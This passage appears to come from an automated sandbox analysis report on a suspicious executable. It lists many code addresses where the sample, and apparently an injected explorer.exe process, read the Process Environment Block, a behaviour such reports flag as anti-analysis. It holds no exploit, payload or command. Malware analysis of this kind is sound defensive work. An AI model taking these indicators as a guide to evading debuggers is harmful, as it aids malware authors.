          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01663B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01663B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01705BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01641B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01641B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01674A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01674A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01648A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01635210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01635210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01635210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01635210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01653A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01673D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01657D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01634F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01634F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0170070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01648794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01668E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01678EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01708ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
